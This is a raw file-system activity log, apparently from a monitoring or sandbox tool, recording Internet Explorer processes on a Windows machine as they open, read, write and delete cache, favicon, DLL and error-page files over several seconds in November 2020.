11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_CC454B4715D7B4F5214225DF136FD021
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.403Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\521F25E202FF760B8461B88413F425E7
11/3/2020 - 11:45:49.450Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.450Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.450Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.450Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.450Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.450Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.793Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.793Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.793Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.793Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.793Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.981Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.981Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.981Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.981Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.981Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.981Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.981Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.981Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.981Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.981Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
11/3/2020 - 11:45:49.981Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
11/3/2020 - 11:45:49.981Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
11/3/2020 - 11:45:49.981Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
11/3/2020 - 11:45:49.981Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.981Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.981Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.981Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.981Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.981Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.981Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.981Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.981Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.981Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.981Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.997Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.997Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.997Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.997Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:49.997Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.997Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.997Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.997Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
11/3/2020 - 11:45:49.997Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.997Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.997Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.997Read2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.997Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.997Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.997Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:49.997Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83BE8B021F9E811DFC8C8A28572A17C05A_DC7BEFCD3E9D2C9B8A23614722575D83
11/3/2020 - 11:45:50.278Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mshtml.dll
11/3/2020 - 11:45:50.278Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mshtml.dll
11/3/2020 - 11:45:50.293Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\WindowsShell.Manifest
11/3/2020 - 11:45:50.293Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\WindowsShell.ManifestWindowsShell.Manifest
11/3/2020 - 11:45:50.293Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE.Local
11/3/2020 - 11:45:50.293Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:50.293Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:50.293Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:53.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5426E1A8-4F1B-11E8-8B8A-525400842A13}.dat
11/3/2020 - 11:45:53.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Internet Explorer\ntmarta.dll
11/3/2020 - 11:45:53.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ntmarta.dll
11/3/2020 - 11:45:53.903Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\System32\ntmarta.dll
11/3/2020 - 11:45:53.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:53.950Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow
11/3/2020 - 11:45:53.950Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services
11/3/2020 - 11:45:53.950Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\favicon[1].ico
11/3/2020 - 11:45:54.137Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\favicon[1].icofavicon[1].ico
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8
11/3/2020 - 11:45:54.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\favicon[1].png
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\favicon[2].png
11/3/2020 - 11:45:54.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\favicon[2].pngfavicon[2].png
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\favicon[1].ico
11/3/2020 - 11:45:54.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\favicon[1].icofavicon[1].ico
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\favicon[1].ico
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\favicon[1].ico
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\favicon[1].icofavicon[1].ico
11/3/2020 - 11:45:54.137Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\favicon[1].icofavicon[1].ico
11/3/2020 - 11:45:54.137Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.icosearch_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\favicon[1].icofavicon[1].ico
11/3/2020 - 11:45:54.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\A6STR8JF\favicon[1].icofavicon[1].ico
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.icosearch_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.icosearch_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.icosearch_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.icosearch_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.icosearch_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.icosearch_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.icosearch_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.icosearch_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.icosearch_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Read1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.icosearch_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Open1928C:\Program Files\Internet Explorer\iexplore.exeC:\Monitor\Files\DeletedFiles\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Write1928C:\Program Files\Internet Explorer\iexplore.exeC:\Monitor\Files\DeletedFiles\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.icosearch_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Delete1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.icosearch_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:54.137Unknown1928C:\Program Files\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.icosearch_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
11/3/2020 - 11:45:55.856Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
11/3/2020 - 11:45:55.887Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8
11/3/2020 - 11:45:55.887Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8
11/3/2020 - 11:45:55.887Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\invalidcert[1]
11/3/2020 - 11:45:55.887Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\invalidcert[1]invalidcert[1]
11/3/2020 - 11:45:55.887Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\invalidcert[1]invalidcert[1]
11/3/2020 - 11:45:55.887Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\invalidcert[1]
11/3/2020 - 11:45:55.887Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\invalidcert[1]invalidcert[1]
11/3/2020 - 11:45:55.887Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\WindowsShell.Manifest
11/3/2020 - 11:45:55.887Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\WindowsShell.ManifestWindowsShell.Manifest
11/3/2020 - 11:45:55.934Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\jscript9.dll
11/3/2020 - 11:45:55.934Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\jscript9.dll
11/3/2020 - 11:45:56.28Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8
11/3/2020 - 11:45:56.28Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8
11/3/2020 - 11:45:56.28Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\ErrorPageTemplate[1]
11/3/2020 - 11:45:56.28Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\ErrorPageTemplate[1]ErrorPageTemplate[1]
11/3/2020 - 11:45:56.28Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\ErrorPageTemplate[1]
11/3/2020 - 11:45:56.28Write2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\ErrorPageTemplate[1]ErrorPageTemplate[1]
